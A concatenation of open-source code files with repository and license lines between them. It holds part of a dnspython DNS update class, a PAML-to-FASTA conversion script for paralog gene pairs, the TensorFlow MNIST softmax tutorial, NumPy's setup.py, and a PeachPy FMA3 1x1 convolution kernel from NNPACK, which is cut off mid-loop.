        Note that if you want to replace the entire node, you should do
        a delete of the name followed by one or more calls to add."""
        self._add(True, self.authority, name, *args)

    def present(self, name, *args):
        """Require that an owner name (and optionally an rdata type,
        or specific rdataset) exists as a prerequisite to the
        execution of the update. The first argument is always a name.
        The other arguments can be:

            - rdataset...

            - rdata...

            - rdtype, string..."""
        if isinstance(name, (str, unicode)):
            name = dns.name.from_text(name, None)
        if len(args) == 0:
            # "Name is in use" prerequisite (class ANY, type ANY).
            rrset = self.find_rrset(self.answer, name,
                                    dns.rdataclass.ANY, dns.rdatatype.ANY,
                                    dns.rdatatype.NONE, None,
                                    True, True)
        elif isinstance(args[0], dns.rdataset.Rdataset) or \
             isinstance(args[0], dns.rdata.Rdata) or \
             len(args) > 1:
            if not isinstance(args[0], dns.rdataset.Rdataset):
                # Add a 0 TTL
                args = list(args)
                args.insert(0, 0)
            # Exact-match prerequisites go in the answer section.
            self._add(False, self.answer, name, *args)
        else:
            rdtype = args[0]
            if isinstance(rdtype, (str, unicode)):
                rdtype = dns.rdatatype.from_text(rdtype)
            # "RRset of this type exists" prerequisite.
            rrset = self.find_rrset(self.answer, name,
                                    dns.rdataclass.ANY, rdtype,
                                    dns.rdatatype.NONE, None,
                                    True, True)

    def absent(self, name, rdtype=None):
        """Require that an owner name (and optionally an rdata type) does
        not exist as a prerequisite to the execution of the update."""
        if isinstance(name, (str, unicode)):
            name = dns.name.from_text(name, None)
        if rdtype is None:
            # "Name is not in use" prerequisite (class NONE, type ANY).
            rrset = self.find_rrset(self.answer, name,
                                    dns.rdataclass.NONE, dns.rdatatype.ANY,
                                    dns.rdatatype.NONE, None,
                                    True, True)
        else:
            if isinstance(rdtype, (str, unicode)):
                rdtype = dns.rdatatype.from_text(rdtype)
            # "RRset of this type does not exist" prerequisite.
            rrset = self.find_rrset(self.answer, name,
                                    dns.rdataclass.NONE, rdtype,
                                    dns.rdatatype.NONE, None,
                                    True, True)

    def to_wire(self, origin=None, max_size=65535):
        """Return a string containing the update in DNS compressed wire
        format.
        @rtype: string"""
        if origin is None:
            origin = self.origin
        return super(Update, self).to_wire(origin, max_size)
| gpl-2.0 |
xjw1001001/IGCexpansion | test/Ancestral_reconstruction/PAML/parse reconstructed fasta.py | 1 | 7314 | # -*- coding: utf-8 -*-
"""
Created on Thu Aug 10 08:23:33 2017
@author: xjw1001001
"""
#only when PAML in desktop is available,the yeast version only
from Bio import Seq, SeqIO, AlignIO
from Bio.Phylo.PAML import codeml, baseml
import numpy as np
# Yeast paralog gene pairs (systematic ORF names) whose PAML ancestral
# reconstructions are converted to FASTA by the loop below.
paralog_list = [['YLR406C', 'YDL075W'],
                ['YER131W', 'YGL189C'],
                ['YML026C', 'YDR450W'],
                ['YNL301C', 'YOL120C'],
                ['YNL069C', 'YIL133C'],
                ['YMR143W', 'YDL083C'],
                ['YJL177W', 'YKL180W'],
                ['YBR191W', 'YPL079W'],
                ['YER074W', 'YIL069C'],
                ['YDR418W', 'YEL054C'],
                ['YBL087C', 'YER117W'],
                ['YLR333C', 'YGR027C'],
                ['YMR142C', 'YDL082W'],
                ['YER102W', 'YBL072C'],
                ]
for pair in paralog_list:
    # Convert PAML's ancestral reconstruction ("construct.fasta") for one
    # yeast paralog pair into a conventional FASTA file, renaming PAML's
    # internal "node #N" labels to Root/N0..N5 names tagged with the gene.
    # NOTE: the order of the replace() calls is significant -- the space in
    # 'node #14' must be handled before all spaces are stripped.
    primalline = []
    fastaline = []
    with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) + '/out/construct.fasta', 'r') as f:
        for line in f.readlines():
            primalline.append(line)
            sline = '>' + line
            sline = sline.replace('node #14', 'Root' + pair[0])
            sline = sline.replace(' ', '')
            sline = sline.replace('\n', '')
            sline = sline.replace('node#15', 'N0' + pair[0])
            # node#16..#20 become N1..N5 tagged with the second gene;
            # node#21..#25 become N1..N5 tagged with the first gene.
            for i in range(5):
                sline = sline.replace('node#' + str(15 + 1 + i), 'N' + str(1 + i) + pair[1])
                sline = sline.replace('node#' + str(20 + 1 + i), 'N' + str(1 + i) + pair[0])
            # Break the line after each gene-name tag so the FASTA header
            # and the sequence end up on separate lines.
            sline = sline.replace(pair[0], pair[0] + '\n')
            sline = sline.replace(pair[1], pair[1] + '\n')
            fastaline.append(sline)
    # 'with' guarantees the output file is closed even if a write fails
    # (the original open()/close() pair leaked the handle on error).
    with open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) + '.fasta', 'w+') as f1:
        for line in fastaline:
            f1.write(line)
            f1.write('\n')
#ERa_ERb
# Same conversion for the ERa/ERb pair; this tree is larger, so the
# node-number -> node-name mapping is spelled out explicitly.
pair = ['ERa', 'ERb']
primalline = []
fastaline = []
substitution_dict = {'node#39':'N14ERa','node#38':'N8ERa','node#37':'N7ERa','node#36':'N6ERa','node#41':'N9ERa','node#40':'N5ERa'
                     ,'node#35':'N4ERa','node#44':'N13ERa','node#46':'N12ERa','node#47':'N11ERa','node#45':'N10ERa'
                     ,'node#43':'N3ERa','node#42':'N2ERa','node#34':'N1ERa'
                     ,'node#53':'N14ERb','node#52':'N8ERb','node#51':'N7ERb','node#50':'N6ERb','node#55':'N9ERb','node#54':'N5ERb'
                     ,'node#49':'N4ERb','node#58':'N13ERb','node#60':'N12ERb','node#61':'N11ERb','node#59':'N10ERb'
                     ,'node#57':'N3ERb','node#56':'N2ERb','node#48':'N1ERb'}
with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) + '/out/construct.fasta', 'r') as f:
    for line in f.readlines():
        primalline.append(line)
        sline = '>' + line
        # 'node #32' (the root) must be renamed before spaces are stripped.
        sline = sline.replace('node #32', 'Root' + pair[0])
        sline = sline.replace(' ', '')
        sline = sline.replace('\n', '')
        sline = sline.replace('node#33', 'N0' + pair[0])
        # All keys are distinct fixed-width 'node#NN' labels, so the dict
        # iteration order of the replacements does not matter.
        for i in substitution_dict.keys():
            sline = sline.replace(i, substitution_dict[i])
        sline = sline.replace(pair[0], pair[0] + '\n')
        sline = sline.replace(pair[1], pair[1] + '\n')
        fastaline.append(sline)
# Context-managed write so the handle is closed even on error.
with open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) + '.fasta', 'w+') as f1:
    for line in fastaline:
        f1.write(line)
        f1.write('\n')
#ARa_ERa
# Same conversion for the ARa/ERa pair.  Here even the root labels
# ('node#28'/'node#29') are renamed through the mapping, so no separate
# pre-strip root replacement is needed.
pair = ['ARa', 'ERa']
primalline = []
fastaline = []
substitution_dict = {'node#36':'N12ERa','node#35':'N11ERa','node#34':'N7ERa','node#33':'N6ERa','node#32':'N5ERa','node#37':'N8ERa'
                     ,'node#31':'N4ERa','node#41':'N10ERa','node#40':'N9ERa','node#39':'N3ERa','node#38':'N2ERa'
                     ,'node#30':'N1ERa'
                     ,'node#48':'N12ARa','node#47':'N11ARa','node#46':'N7ARa','node#45':'N6ARa','node#44':'N5ARa','node#49':'N8ARa'
                     ,'node#43':'N4ARa','node#53':'N10ARa','node#52':'N9ARa','node#51':'N3ARa','node#50':'N2ARa'
                     ,'node#42':'N1ARa','node#29':'N0ERa','node#28':'RootERa'}
with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) + '/out/construct.fasta', 'r') as f:
    for line in f.readlines():
        primalline.append(line)
        sline = '>' + line
        # Stripping spaces first turns 'node #NN' into 'node#NN', which the
        # mapping keys then match.
        sline = sline.replace(' ', '')
        sline = sline.replace('\n', '')
        for i in substitution_dict.keys():
            sline = sline.replace(i, substitution_dict[i])
        sline = sline.replace(pair[0], pair[0] + '\n')
        sline = sline.replace(pair[1], pair[1] + '\n')
        fastaline.append(sline)
# Context-managed write so the handle is closed even on error.
with open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) + '.fasta', 'w+') as f1:
    for line in fastaline:
        f1.write(line)
        f1.write('\n')
#ARGRMRPR
# Conversion for every pairing of the AR/MR/GR/PR receptor genes.  The node
# numbering is identical for each pair, so the mapping is rebuilt per pair
# with the gene names substituted in.
pairlist = [['AR', 'MR'],
            ['AR', 'GR'],
            ['AR', 'PR'],
            ['MR', 'GR'],
            ['MR', 'PR'],
            ['PR', 'GR']]
for pair in pairlist:
    primalline = []
    fastaline = []
    # NOTE(review): the root here is labelled 'ROOT' (upper case) while the
    # other conversions above use 'Root' -- confirm downstream consumers
    # before unifying.
    substitution_dict = {'node#25':'N4'+pair[0],'node#31':'N9'+pair[0],'node#30':'N7'+pair[0]
                         ,'node#32':'N8'+pair[0],'node#29':'N6'+pair[0],'node#28':'N5'+pair[0]
                         ,'node#27':'N3'+pair[0],'node#26':'N2'+pair[0],'node#24':'N1'+pair[0]
                         ,'node#34':'N4'+pair[1],'node#40':'N9'+pair[1],'node#39':'N7'+pair[1]
                         ,'node#41':'N8'+pair[1],'node#38':'N6'+pair[1],'node#37':'N5'+pair[1]
                         ,'node#36':'N3'+pair[1],'node#35':'N2'+pair[1],'node#33':'N1'+pair[1]
                         ,'node#23':'N0'+pair[0],'node#22':'ROOT'+pair[0]
                         }
    with open('/Users/xjw1001001/Desktop/PAML/output/' + '_'.join(pair) + '/out/construct.fasta', 'r') as f:
        for line in f.readlines():
            primalline.append(line)
            sline = '>' + line
            sline = sline.replace(' ', '')
            sline = sline.replace('\n', '')
            for i in substitution_dict.keys():
                sline = sline.replace(i, substitution_dict[i])
            sline = sline.replace(pair[0], pair[0] + '\n')
            sline = sline.replace(pair[1], pair[1] + '\n')
            fastaline.append(sline)
    # Context-managed write so the handle is closed even on error.
    with open('/Users/xjw1001001/Desktop/PAML/PAMLfasta/PAML_' + '_'.join(pair) + '.fasta', 'w+') as f1:
        for line in fastaline:
            f1.write(line)
            f1.write('\n')
# Collect selected codeml parameter estimates for every paralog pair.
PAML_parameter_dict = {}
path = '/Users/xjw1001001/Desktop/PAML/'
paralog_list = [['YLR406C', 'YDL075W'],#pair#TODO: other data
                ['YER131W', 'YGL189C'], ['YML026C', 'YDR450W'], ['YNL301C', 'YOL120C'], ['YNL069C', 'YIL133C'],
                ['YMR143W', 'YDL083C'], ['YJL177W', 'YKL180W'], ['YBR191W', 'YPL079W'], ['YER074W', 'YIL069C'],
                ['YDR418W', 'YEL054C'], ['YBL087C', 'YER117W'], ['YLR333C', 'YGR027C'], ['YMR142C', 'YDL082W'],
                ['YER102W', 'YBL072C'], ['EDN', 'ECP'],['ERa', 'ERb'],['AR', 'MR'],['AR', 'GR'],['AR', 'PR'],
                ['MR', 'GR'],['MR', 'PR'],['PR', 'GR'] ]
for pair in paralog_list:#parameters: kappa(-5), omega(-1), tau,branches
    PAML_parameter_dict['_'.join(pair)] = {}
    # Parse the codeml output file for this pair via Biopython's PAML wrapper.
    codeml_result = codeml.read(path+'output/' + '_'.join(pair) + '/out/' + '_'.join(pair) + '_codeml')
    #baseml_result = baseml.read('/Users/xjw1001001/Documents/GitHub/IGCexpansion2/test/Ancestral_reconstruction/PAML/output/' + '_'.join(pair) + '/' + '_'.join(pair) + '_baseml')
    # 'parameter list' is a space-separated string; per the loop comment
    # above, kappa is the 5th-from-last field and omega the last.  NOTE:
    # the values are stored as strings, not converted to float.
    parameter_list = codeml_result['NSsites'][0]['parameters']['parameter list'].split(' ')
    PAML_parameter_dict['_'.join(pair)]['kappa'] = parameter_list[-5]
    PAML_parameter_dict['_'.join(pair)]['omega'] = parameter_list[-1]
| gpl-3.0 |
qinjian623/dlnotes | tutorials/tensorflow/mnist_softmax.py | 1 | 2619 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A very simple MNIST classifier.
See extensive documentation at
http://tensorflow.org/tutorials/mnist/beginners/index.md
"""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
# Import data
from tensorflow.examples.tutorials.mnist import input_data
import tensorflow as tf
FLAGS = None  # populated from argparse in the __main__ block below


def main(_):
  # Load the MNIST dataset (downloaded to FLAGS.data_dir on first use),
  # with labels one-hot encoded.
  mnist = input_data.read_data_sets(FLAGS.data_dir, one_hot=True)

  # Create the model: a single linear layer (softmax regression).
  # x holds flattened 28x28 images; W and b are the learned parameters.
  x = tf.placeholder(tf.float32, [None, 784])
  W = tf.Variable(tf.zeros([784, 10]))
  b = tf.Variable(tf.zeros([10]))
  y = tf.matmul(x, W) + b

  # Define loss and optimizer
  y_ = tf.placeholder(tf.float32, [None, 10])

  # The raw formulation of cross-entropy,
  #
  #   tf.reduce_mean(-tf.reduce_sum(y_ * tf.log(tf.softmax(y)),
  #                                 reduction_indices=[1]))
  #
  # can be numerically unstable.
  #
  # So here we use tf.nn.softmax_cross_entropy_with_logits on the raw
  # outputs of 'y', and then average across the batch.
  # NOTE(review): the positional (logits, labels) order matches the pre-1.0
  # TensorFlow API; later releases require keyword arguments here -- confirm
  # the TF version this notebook targets.
  cross_entropy = tf.reduce_mean(tf.nn.softmax_cross_entropy_with_logits(y, y_))
  train_step = tf.train.GradientDescentOptimizer(0.5).minimize(cross_entropy)

  sess = tf.InteractiveSession()
  # Train
  # NOTE(review): initialize_all_variables() was deprecated in favour of
  # global_variables_initializer() in later TF releases -- confirm.
  tf.initialize_all_variables().run()
  # 50000 mini-batches of 100 samples each (the upstream tutorial uses 1000).
  for _ in range(50000):
    batch_xs, batch_ys = mnist.train.next_batch(100)
    sess.run(train_step, feed_dict={x: batch_xs, y_: batch_ys})

  # Test trained model: accuracy = fraction of argmax predictions matching
  # the one-hot labels.
  correct_prediction = tf.equal(tf.argmax(y, 1), tf.argmax(y_, 1))
  accuracy = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))
  print(sess.run(accuracy, feed_dict={x: mnist.test.images,
                                      y_: mnist.test.labels}))
if __name__ == '__main__':
  # Parse --data_dir and hand control to tf.app.run(), which invokes main().
  parser = argparse.ArgumentParser()
  parser.add_argument('--data_dir', type=str, default='/tmp/data',
                      help='Directory for storing data')
  FLAGS = parser.parse_args()
  tf.app.run()
| gpl-3.0 |
dimasad/numpy | setup.py | 21 | 8298 | #!/usr/bin/env python
"""NumPy: array processing for numbers, strings, records, and objects.
NumPy is a general-purpose array-processing package designed to
efficiently manipulate large multi-dimensional arrays of arbitrary
records without sacrificing too much speed for small multi-dimensional
arrays. NumPy is built on the Numeric code base and adds features
introduced by numarray as well as an extended C-API and the ability to
create arrays of arbitrary type which also makes NumPy suitable for
interfacing with general-purpose data-base applications.
There are also basic facilities for discrete fourier transform,
basic linear algebra and random number generation.
"""
from __future__ import division, print_function
# First line and body of the module docstring feed setup()'s description
# fields in setup_package() below.
DOCLINES = __doc__.split("\n")

import os
import sys
import subprocess


if sys.version_info[:2] < (2, 6) or (3, 0) <= sys.version_info[0:2] < (3, 2):
    raise RuntimeError("Python version 2.6, 2.7 or >= 3.2 required.")

# The builtins module is named __builtin__ on Python 2.
if sys.version_info[0] >= 3:
    import builtins
else:
    import __builtin__ as builtins
# Trove classifiers passed to setup(); split into a list (empty lines
# dropped) in setup_package().
CLASSIFIERS = """\
Development Status :: 5 - Production/Stable
Intended Audience :: Science/Research
Intended Audience :: Developers
License :: OSI Approved
Programming Language :: C
Programming Language :: Python
Programming Language :: Python :: 3
Topic :: Software Development
Topic :: Scientific/Engineering
Operating System :: Microsoft :: Windows
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""

# Version components; ISRELEASED controls whether a '.dev0+<sha>' suffix is
# appended by get_version_info().
MAJOR               = 1
MINOR               = 10
MICRO               = 0
ISRELEASED          = False
VERSION             = '%d.%d.%d' % (MAJOR, MINOR, MICRO)
def git_version():
    """Return the git revision as a string, or "Unknown" when the git
    executable cannot be launched."""
    def _run_git(cmd):
        # Construct a minimal, locale-neutral environment so git's output
        # is not translated.
        env = {}
        for key in ['SYSTEMROOT', 'PATH']:
            value = os.environ.get(key)
            if value is not None:
                env[key] = value
        env['LANGUAGE'] = 'C'  # LANGUAGE is used on win32
        env['LANG'] = 'C'
        env['LC_ALL'] = 'C'
        proc = subprocess.Popen(cmd, stdout=subprocess.PIPE, env=env)
        return proc.communicate()[0]

    try:
        revision = _run_git(['git', 'rev-parse', 'HEAD']).strip().decode('ascii')
    except OSError:
        revision = "Unknown"
    return revision
# BEFORE importing distutils, remove MANIFEST. distutils doesn't properly
# update it when the contents of directories change.
if os.path.exists('MANIFEST'): os.remove('MANIFEST')

# This is a bit hackish: we are setting a global variable so that the main
# numpy __init__ can detect if it is being loaded by the setup routine, to
# avoid attempting to load components that aren't built yet. While ugly, it's
# a lot more robust than what was previously being used.
# (numpy/__init__.py checks for this attribute at import time.)
builtins.__NUMPY_SETUP__ = True
def get_version_info():
    """Return (FULLVERSION, GIT_REVISION) for the current checkout.

    Adding the git rev number needs to be done here rather than at module
    import, otherwise the import of numpy.version messes up the build under
    Python 3.
    """
    if os.path.exists('.git'):
        git_revision = git_version()
    elif os.path.exists('numpy/version.py'):
        # Must be a source distribution: reuse the shipped version file.
        try:
            from numpy.version import git_revision
        except ImportError:
            raise ImportError("Unable to import git_revision. Try removing " \
                              "numpy/version.py and the build directory " \
                              "before building.")
    else:
        git_revision = "Unknown"

    full_version = VERSION
    if not ISRELEASED:
        full_version += '.dev0+' + git_revision[:7]

    return full_version, git_revision
def write_version_py(filename='numpy/version.py'):
    """Generate the numpy version file.

    The file is rewritten on every build so the embedded git revision stays
    current.
    """
    # Template for the generated module.  The assignment under
    # ``if not release:`` must be indented, otherwise the generated file is
    # not valid Python (the unindented form was a bug).
    cnt = """
# THIS FILE IS GENERATED FROM NUMPY SETUP.PY
short_version = '%(version)s'
version = '%(version)s'
full_version = '%(full_version)s'
git_revision = '%(git_revision)s'
release = %(isrelease)s
if not release:
    version = full_version
"""
    FULLVERSION, GIT_REVISION = get_version_info()

    # Context manager replaces the previous try/finally close() pair.
    with open(filename, 'w') as a:
        a.write(cnt % {'version': VERSION,
                       'full_version': FULLVERSION,
                       'git_revision': GIT_REVISION,
                       'isrelease': str(ISRELEASED)})
def configuration(parent_package='', top_path=None):
    """Build the numpy.distutils Configuration used for the real build."""
    from numpy.distutils.misc_util import Configuration

    cfg = Configuration(None, parent_package, top_path)
    cfg.set_options(
        ignore_setup_xxx_py=True,
        assume_default_configuration=True,
        delegate_options_to_subpackages=True,
        quiet=True,
    )

    cfg.add_subpackage('numpy')
    cfg.get_version('numpy/version.py')  # sets cfg.version

    return cfg
def check_submodules():
    """Verify that the submodules are checked out and clean.

    On failure the remedy is ``git submodule update --init``.
    """
    # Not a git checkout (e.g. an sdist): nothing to verify.
    if not os.path.exists('.git'):
        return

    # Every submodule path listed in .gitmodules must exist on disk.
    with open('.gitmodules') as f:
        for line in f:
            if 'path' not in line:
                continue
            p = line.split('=')[-1].strip()
            if not os.path.exists(p):
                raise ValueError('Submodule %s missing' % p)

    # A leading '-' (not initialized) or '+' (wrong commit checked out) in
    # `git submodule status` output marks a dirty submodule.
    proc = subprocess.Popen(['git', 'submodule', 'status'],
                            stdout=subprocess.PIPE)
    status, _ = proc.communicate()
    for line in status.decode("ascii", "replace").splitlines():
        if line.startswith(('-', '+')):
            raise ValueError('Submodule not clean: %s' % line)
from distutils.command.sdist import sdist
class sdist_checked(sdist):
    """ check submodules on sdist to prevent incomplete tarballs """
    def run(self):
        # Fail fast if any git submodule is missing or dirty before letting
        # distutils assemble the source tarball.
        check_submodules()
        sdist.run(self)
def generate_cython():
    """Run the cythonize helper over numpy/random; raise on failure."""
    cwd = os.path.abspath(os.path.dirname(__file__))
    print("Cythonizing sources")
    returncode = subprocess.call([sys.executable,
                                  os.path.join(cwd, 'tools', 'cythonize.py'),
                                  'numpy/random'],
                                 cwd=cwd)
    if returncode != 0:
        raise RuntimeError("Running cythonize failed!")
def setup_package():
    """Top-level driver: write the version file, choose the appropriate
    setup() implementation, and run the build from the source directory."""
    # Build from the source tree regardless of the caller's cwd; restored in
    # the finally block below.
    src_path = os.path.dirname(os.path.abspath(sys.argv[0]))
    old_path = os.getcwd()
    os.chdir(src_path)
    sys.path.insert(0, src_path)

    # Rewrite the version file everytime
    write_version_py()

    metadata = dict(
        name = 'numpy',
        maintainer = "NumPy Developers",
        maintainer_email = "numpy-discussion@scipy.org",
        description = DOCLINES[0],
        long_description = "\n".join(DOCLINES[2:]),
        url = "http://www.numpy.org",
        author = "Travis E. Oliphant et al.",
        download_url = "http://sourceforge.net/projects/numpy/files/NumPy/",
        license = 'BSD',
        classifiers=[_f for _f in CLASSIFIERS.split('\n') if _f],
        platforms = ["Windows", "Linux", "Solaris", "Mac OS-X", "Unix"],
        test_suite='nose.collector',
        cmdclass={"sdist": sdist_checked},
        package_data={'numpy.core': ['libopenblaspy.dll']},
    )

    # Run build
    if len(sys.argv) >= 2 and ('--help' in sys.argv[1:] or
            sys.argv[1] in ('--help-commands', 'egg_info', '--version',
                            'clean')):
        # Use setuptools for these commands (they don't work well or at all
        # with distutils). For normal builds use distutils.
        try:
            from setuptools import setup
        except ImportError:
            from distutils.core import setup

        FULLVERSION, GIT_REVISION = get_version_info()
        metadata['version'] = FULLVERSION
    else:
        if len(sys.argv) >= 2 and sys.argv[1] == 'bdist_wheel':
            # bdist_wheel needs setuptools
            import setuptools
        from numpy.distutils.core import setup
        cwd = os.path.abspath(os.path.dirname(__file__))
        if not os.path.exists(os.path.join(cwd, 'PKG-INFO')):
            # Generate Cython sources, unless building from source release
            generate_cython()
        # Full builds use the numpy.distutils configuration defined above.
        metadata['configuration'] = configuration

    try:
        setup(**metadata)
    finally:
        # Undo the path/cwd changes made at the top of this function.
        del sys.path[0]
        os.chdir(old_path)
    return
if __name__ == '__main__':
    # Run the build/installation only when executed as a script.
    setup_package()
| bsd-3-clause |
Maratyszcza/NNPACK | src/x86_64-fma/blas/conv1x1.py | 3 | 9327 | from __future__ import absolute_import
from __future__ import division
# Micro-kernel tile size: mr input channels x nr output channels per call.
mr, nr = 2, 4


arg_input_channels = Argument(size_t, "input_channels")
arg_image_size = Argument(size_t, "image_size")
arg_input = Argument(ptr(const_float_), "input")
arg_kernel = Argument(ptr(const_float_), "kernel")
arg_output = Argument(ptr(float_), "output")
# 1x1 convolution micro-kernel for exactly mr input channels and nr output
# channels, emitted as x86-64 FMA3 assembly via the PeachPy DSL.
with Function("nnp_conv1x1_only_{mr}x{nr}__fma3".format(mr=mr, nr=nr),
    (arg_input_channels, arg_image_size, arg_input, arg_kernel, arg_output),
    target=uarch.default + isa.fma3):

    reg_input_channels = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_input_channels, arg_input_channels)
    # Shift left by 2: convert an element count into a byte stride
    # (sizeof(float) == 4).
    SHL(reg_input_channels, 2)

    reg_image_size = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_image_size, arg_image_size)
    SHL(reg_image_size, 2)

    # Consecutive input-channel pointers, each one image (image_size bytes)
    # apart.
    reg_inputs = [GeneralPurposeRegister64() for m in range(mr)]
    LOAD.ARGUMENT(reg_inputs[0], arg_input)
    for m in range(1, mr):
        LEA(reg_inputs[m], [reg_inputs[m - 1] + reg_image_size * 1])

    reg_kernel = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_kernel, arg_kernel)

    reg_outputs = [GeneralPurposeRegister64() for n in range(nr)]
    LOAD.ARGUMENT(reg_outputs[0], arg_output)
    for n in range(1, nr):
        LEA(reg_outputs[n], [reg_outputs[n - 1] + reg_image_size * 1])

    # Broadcast each of the mr x nr scalar kernel coefficients into its own
    # YMM register; rows of the kernel matrix are input_channels floats apart.
    ymm_kernel = [[YMMRegister() for n in range(nr)] for m in range(mr)]
    for n in range(nr):
        for m in range(mr):
            VBROADCASTSS(ymm_kernel[m][n], [reg_kernel + m * float_.size])
        if n + 1 != nr:
            ADD(reg_kernel, reg_input_channels)

    main_loop = Loop()
    final_block = Block()

    # Process 8 pixels (one YMM register of floats) per iteration; JB skips
    # straight to the masked tail when fewer than 8 remain.
    SUB(reg_image_size, YMMRegister.size)
    JB(main_loop.end)

    with main_loop:
        # Load vectors from different channels of the output image
        ymm_outputs = [YMMRegister() for n in range(nr)]
        for reg_output, ymm_output in zip(reg_outputs, ymm_outputs):
            VMOVUPS(ymm_output, [reg_output])

        for m, reg_input in enumerate(reg_inputs):
            # Load vector for a channel of the input image
            ymm_input = YMMRegister()
            VMOVUPS(ymm_input, [reg_input])
            ADD(reg_input, YMMRegister.size)

            # Update all outputs using the input and corresponding kernel elements
            for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
                VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_input)
                # Store each output only after the last input channel has
                # been accumulated into it.
                if reg_input is reg_inputs[-1]:
                    VMOVUPS([reg_output], ymm_output)
                    ADD(reg_output, YMMRegister.size)

        SUB(reg_image_size, YMMRegister.size)
        JAE(main_loop.begin)

    ADD(reg_image_size, YMMRegister.size)
    JZ(final_block.end)

    with final_block:
        # Build a per-lane mask with reg_image_size leading 0xFFFFFFFF words
        # by indexing into an 8x1/8x0 constant, then use masked loads/stores
        # for the sub-vector tail.
        reg_mask, ymm_mask = GeneralPurposeRegister64(), YMMRegister()
        LEA(reg_mask, Constant.uint32x16(*([0xFFFFFFFF] * 8 + [0x00000000] * 8)))
        SUB(reg_mask, reg_image_size)
        VMOVDQU(ymm_mask, [reg_mask + YMMRegister.size])

        # Load vectors from different channels of the output image
        ymm_outputs = [YMMRegister() for n in range(nr)]
        for reg_output, ymm_output in zip(reg_outputs, ymm_outputs):
            VMASKMOVPS(ymm_output, ymm_mask, [reg_output])

        for m, reg_input in enumerate(reg_inputs):
            # Load vector for a channel of the input image
            ymm_input = YMMRegister()
            VMASKMOVPS(ymm_input, ymm_mask, [reg_input])

            # Update all outputs using the input and corresponding kernel elements
            for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
                VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_input)
                if reg_input is reg_inputs[-1]:
                    VMASKMOVPS([reg_output], ymm_mask, ymm_output)

    RETURN()
arg_mr = Argument(uint32_t, "mr")
arg_nr = Argument(uint32_t, "nr")
arg_input_channels = Argument(size_t, "input_channels")
arg_image_size = Argument(size_t, "image_size")
arg_input = Argument(ptr(const_float_), "input")
arg_kernel = Argument(ptr(const_float_), "kernel")
arg_output = Argument(ptr(float_), "output")
# Variable-tile variant: processes up to mr input channels and up to nr
# output channels, with the actual counts passed at run time.  The CMP/JE
# pairs after each unrolled step skip the remaining steps once the runtime
# count is reached.
with Function("nnp_conv1x1_upto_{mr}x{nr}__fma3".format(mr=mr, nr=nr),
    (arg_mr, arg_nr, arg_input_channels, arg_image_size, arg_input, arg_kernel, arg_output),
    target=uarch.default + isa.fma3):

    reg_mr = GeneralPurposeRegister32()
    LOAD.ARGUMENT(reg_mr, arg_mr)

    reg_nr = GeneralPurposeRegister32()
    LOAD.ARGUMENT(reg_nr, arg_nr)

    reg_input_channels = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_input_channels, arg_input_channels)
    # Shift left by 2: element count -> byte stride (sizeof(float) == 4).
    SHL(reg_input_channels, 2)

    reg_image_size = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_image_size, arg_image_size)
    SHL(reg_image_size, 2)

    reg_inputs = [GeneralPurposeRegister64() for m in range(mr)]
    LOAD.ARGUMENT(reg_inputs[0], arg_input)
    for m in range(1, mr):
        LEA(reg_inputs[m], [reg_inputs[m - 1] + reg_image_size * 1])

    reg_kernel = GeneralPurposeRegister64()
    LOAD.ARGUMENT(reg_kernel, arg_kernel)

    reg_outputs = [GeneralPurposeRegister64() for n in range(nr)]
    LOAD.ARGUMENT(reg_outputs[0], arg_output)
    for n in range(1, nr):
        LEA(reg_outputs[n], [reg_outputs[n - 1] + reg_image_size * 1])

    # Zero all YMM registers so kernel coefficients beyond the runtime
    # mr x nr tile contribute nothing to the FMA accumulation.
    VZEROALL()

    ymm_inputs = [YMMRegister() for m in range(mr)]
    ymm_kernel = [[YMMRegister() for n in range(nr)] for m in range(mr)]
    with Block() as load_kernels:
        for n in range(nr):
            with Block() as load_kernels_row:
                for m in range(mr):
                    VBROADCASTSS(ymm_kernel[m][n], [reg_kernel + m * float_.size])

                    if m + 1 != mr:
                        CMP(reg_mr, m + 1)
                        JE(load_kernels_row.end)

            if n + 1 != nr:
                CMP(reg_nr, n + 1)
                JE(load_kernels.end)

                ADD(reg_kernel, reg_input_channels)

    main_loop = Loop()
    final_block = Block()

    # 8 pixels per iteration; JB jumps to the masked tail when fewer remain.
    SUB(reg_image_size, YMMRegister.size)
    JB(main_loop.end)

    with main_loop:
        # Load vectors from different channels of the output image
        ymm_outputs = [YMMRegister() for n in range(nr)]
        with Block() as load_outputs:
            for n, (reg_output, ymm_output) in enumerate(zip(reg_outputs, ymm_outputs)):
                VMOVUPS(ymm_output, [reg_output])

                if n + 1 != nr:
                    CMP(reg_nr, n + 1)
                    JE(load_outputs.end)

        with Block() as load_inputs:
            for m, (ymm_input, reg_input) in enumerate(zip(ymm_inputs, reg_inputs)):
                # Load vector for a channel of the input image
                VMOVUPS(ymm_input, [reg_input])
                ADD(reg_input, YMMRegister.size)

                # Update all outputs using the input and corresponding kernel elements
                for n, ymm_output in enumerate(ymm_outputs):
                    VFMADD231PS(ymm_output, ymm_kernel[m][n], ymm_input)

                if m + 1 != mr:
